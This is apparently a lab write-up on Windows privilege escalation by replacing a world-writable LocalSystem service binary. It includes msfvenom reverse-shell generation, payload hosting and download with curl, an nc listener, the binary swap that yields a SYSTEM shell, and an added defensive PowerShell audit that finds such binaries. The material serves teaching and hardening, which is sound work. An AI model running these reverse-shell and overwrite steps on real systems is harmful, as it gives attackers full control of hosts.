Privilege escalation via a writable service executable
Every Windows service starts by running an executable. If our low-privilege user has write access to that executable (or to its directory), we can overwrite the legitimate binary with a malicious one; the next time the service starts, it runs our file with the service's own privileges (here LocalSystem).
Generate a reverse shell with msfvenom
root@ip-10-10-4-200:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.4.200 LPORT=6666 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
root@ip-10-10-4-200:~/Desktop#
Start an HTTP server to host the payload
root@ip-10-10-4-200:~/Desktop# python3 -m http.server 1010
Serving HTTP on 0.0.0.0 port 1010 (http://0.0.0.0:1010/) ...
Download the file on the target with curl
curl -O 10.10.4.200:1010/reverse.exe
On the attack machine, listen on port 6666, then run the executable on the target to get a reverse shell.
Query the "filepermsvc" service to see whether it runs as SYSTEM (SERVICE_START_NAME).
root@ip-10-10-4-200:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.249.138 49806 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>sc qc filepermsvc
sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : File Permissions Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>
Check the binary's file permissions with accesschk
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
Output
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESS
C:\Users\user\Desktop>
Check whether we are allowed to start/stop the service
C:\PrivEsc\accesschk.exe /accepteula -uvqc filepermsvc
Output
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uvqc filepermsvc
C:\PrivEsc\accesschk.exe /accepteula -uvqc filepermsvc
filepermsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
R Everyone
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\Users\user\Desktop>
Back up the original binary, then overwrite it with the reverse-shell executable
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
copy /Y C:\Users\user\Desktop\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
Output
C:\Users\user\Desktop>copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
1 file(s) copied.
C:\Users\user\Desktop>copy /Y C:\Users\user\Desktop\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
copy /Y C:\Users\user\Desktop\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
1 file(s) copied.
With the attack machine listening on the shell port, restart the service on the target
C:\Users\user\Desktop>net start filepermsvc
net start filepermsvc
The shell comes back, now running as SYSTEM.
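Added example, not part of the original walkthrough: a PowerShell audit that does host-wide what the two accesschk checks above do for one service, listing every service running as LocalSystem whose binary grants write or delete rights to a low-privilege principal such as Everyone or BUILTIN\Users. It assumes an elevated PowerShell 5.1+ session on the host being audited; the principal list and the rights mask are my choices, and the icacls remediation in the comment is a general fix, not something the walkthrough shows.

```powershell
# Added audit script (not from the original walkthrough). Assumes an elevated
# PowerShell 5.1+ session on the host being audited.

# Principals that should never hold write access on a service binary.
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')

# Any of these rights lets the file be replaced (as copy /Y did above).
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::Delete

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Strip surrounding quotes and trailing arguments; handles both
    # "C:\Program Files\X\svc.exe" -arg  and  C:\Program Files\X\svc.exe -arg
    if ($PathName -match '^\s*"?([^"]*?\.exe)') { return $Matches[1] }
    return $PathName.Trim('"')
}

function Find-WritableServiceBinary {
    foreach ($svc in Get-CimInstance Win32_Service) {
        # Only services that would hand an attacker SYSTEM are interesting here.
        if ($svc.StartName -ne 'LocalSystem' -or -not $svc.PathName) { continue }
        $bin = [Environment]::ExpandEnvironmentVariables(
                   (Get-ServiceBinaryPath $svc.PathName))
        if (-not (Test-Path -LiteralPath $bin)) { continue }
        $acl = Get-Acl -LiteralPath $bin
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
            # Cast to int so ACEs carrying generic-rights bits still compare.
            if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

# Each finding is a service the attack above would work against. Remediation is
# to drop the low-privilege ACE, e.g.
#   icacls "<binary>" /remove:g "BUILTIN\Users" /remove:g Everyone
# and to audit the containing directory the same way, since write access there
# lets the binary be deleted and recreated even when the file ACL is tight.
Find-WritableServiceBinary | Format-Table -AutoSize
```

On the host in this walkthrough the script would report filepermsvc twice, once for Everyone and once for BUILTIN\Users, both with FullControl, matching the accesschk output above.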